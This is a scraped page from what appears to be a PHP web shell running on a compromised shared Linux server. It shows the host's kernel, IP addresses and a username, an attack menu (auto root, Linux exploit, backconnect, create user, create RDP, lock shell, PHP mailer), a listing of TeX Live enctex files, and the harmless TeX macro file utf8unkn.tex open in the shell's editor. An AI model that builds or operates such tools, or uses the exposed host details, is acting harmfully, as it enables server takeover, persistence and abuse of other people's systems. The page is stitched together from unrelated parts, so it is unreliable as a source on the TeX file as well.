Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
texlive /
texmf-dist /
tex /
generic /
enctex /
[ HOME SHELL ]
Name
Size
Permission
Action
1250-csf.tex
8.04
KB
-rw-r--r--
1250-il2.tex
859
B
-rw-r--r--
1250-latex.tex
2.4
KB
-rw-r--r--
1250-t1.tex
7.47
KB
-rw-r--r--
852-csf.tex
6.37
KB
-rw-r--r--
852-il2.tex
2.13
KB
-rw-r--r--
852-latex.tex
2.39
KB
-rw-r--r--
852-t1.tex
5.78
KB
-rw-r--r--
csfmacro.tex
1.91
KB
-rw-r--r--
enc-u.tex
3.86
KB
-rw-r--r--
encmacro.tex
1.3
KB
-rw-r--r--
il2-1250.tex
860
B
-rw-r--r--
il2-852.tex
2.13
KB
-rw-r--r--
il2-csf.tex
7.41
KB
-rw-r--r--
il2-kam.tex
2.14
KB
-rw-r--r--
il2-t1.tex
5.81
KB
-rw-r--r--
kam-csf.tex
3.43
KB
-rw-r--r--
kam-il2.tex
2.14
KB
-rw-r--r--
kam-latex.tex
2.4
KB
-rw-r--r--
kam-t1.tex
3.49
KB
-rw-r--r--
mixcodes.tex
3.77
KB
-rw-r--r--
noprefnt.tex
1004
B
-rw-r--r--
plain-1250-cs.tex
471
B
-rw-r--r--
plain-852-cs.tex
469
B
-rw-r--r--
plain-il2-cs.tex
473
B
-rw-r--r--
plain-kam-cs.tex
473
B
-rw-r--r--
plain-utf8-cs.tex
470
B
-rw-r--r--
plain-utf8-ec.tex
607
B
-rw-r--r--
polyset.tex
3.04
KB
-rw-r--r--
t1macro.tex
1.87
KB
-rw-r--r--
utf8-csf.tex
8.61
KB
-rw-r--r--
utf8-t1.tex
17.57
KB
-rw-r--r--
utf8cseq.tex
2.79
KB
-rw-r--r--
utf8lat1.tex
7.14
KB
-rw-r--r--
utf8lata.tex
7.54
KB
-rw-r--r--
utf8math.tex
1.93
KB
-rw-r--r--
utf8off.tex
766
B
-rw-r--r--
utf8raw.tex
25.95
KB
-rw-r--r--
utf8unkn.tex
3.14
KB
-rw-r--r--
utf8warn.tex
7.26
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : utf8unkn.tex
% utf8unkn.tex %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% % Feb. 6. 2003 Petr Olsak % % Oct. 2012: More robust macros by \long, \noexpand, \badutfinput (P.O.) % % This macro sets all others UTF-8 codes (not declared formerly or % later) as "unknown" by encTeX primitives. You need the version % Feb. 2003 of encTeX or later. % % You can re-define the \warntwobytes and \warnthreebytes macros % if you need it. The default value of these macros is that % the black box is typeset and warning is printed by \message % and the unknown code is printed without any change to \write files. \def\setunknowncodes {\bgroup \def\a ##1{\mubyte \warntwobytes ####2 ##1\endmubyte} \a ^^c2 \a ^^c3 \a ^^c4 \a ^^c5 \a ^^c6 \a ^^c7 \a ^^c8 \a ^^c9 \a ^^ca \a ^^cb \a ^^cc \a ^^cd \a ^^ce \a ^^cf \a ^^d0 \a ^^d1 \a ^^d2 \a ^^d3 \a ^^d4 \a ^^d5 \a ^^d6 \a ^^d7 \a ^^d8 \a ^^d9 \a ^^da \a ^^db \a ^^dc \a ^^dd \a ^^de \a ^^df \def\a ##1{\mubyte \warnthreebytes ####3 ##1\endmubyte} \a ^^e0 \a ^^e1 \a ^^e2 \a ^^e3 \a ^^e4 \a ^^e5 \a ^^e6 \a ^^e7 \a ^^e8 \a ^^e9 \a ^^ea \a ^^eb \a ^^ec \a ^^ed \a ^^ee \a ^^ef \egroup} \mubyte \writeparameter \relax \endmubyte \def\writeparameter{} \long\def\warntwobytes #1#2{% \ifx\writeparameter\relax % write parameter copies unknown code \expandafter\noconvert\noexpand#1% \expandafter\noconvert\noexpand#2% to output without any change \else \if\noexpand#2\relax \badutfinput \else \ifnum`#2<128 \badutfinput \else \missingutfchar{\expandafter\noconvert\noexpand#1% \expandafter\noconvert\noexpand#2}% \fi\fi\fi} \long\def\warnthreebytes #1#2#3{\ifx\writeparameter\relax \expandafter\noconvert\noexpand#1% \expandafter\noconvert\noexpand#2% \expandafter\noconvert\noexpand#3% \else \if\noexpand#2\relax \badutfinput \else \ifnum`#2<128 \badutfinput \else \missingutfchar{\expandafter\noconvert\noexpand#1% \expandafter\noconvert\noexpand#2% \expandafter\noconvert\noexpand#3}% \fi\fi\fi} \def\badutfinput{{\errorcontextlines=-1 \errhelp={Try to set mubytein=0 or input utf8off or input mixcodes.} \errmessage{UTF-8 INPUT IS CORRUPTED ! \space May be you are using another input encoding}}} \def\missingutfchar#1{{\day=0 \ifnum\day=0 % this makes me more robust in message prameter \newlinechar=`^^J \chardef\$=\xprncode255 \xprncodes=1 \message{WARNING: unknown UTF-8 code: `#1 =}% \xprncodes=0 \message{#1' (line: \the\inputlineno)}% \xprncodes=\$ \leavevmode\hbox{\kern.05em\vrule width.5em height.5em\kern.05em}% \else unknown UTF-8 code `#1'\fi}} % \xprncodes=1 or \xprncodes=0 .. set/unset printability of 128..255 chars \def\xprncodes=#1 {% \count255=128 \loop \xprncode\count255=#1\advance\count255 by 1 \ifnum \count255<256 \repeat } \ifx\unknowncodes\relax \endinput \fi % you can \let\unknowncodes\relax % if you don't want to active % the warncodes immediatelly \setunknowncodes \endinput
Close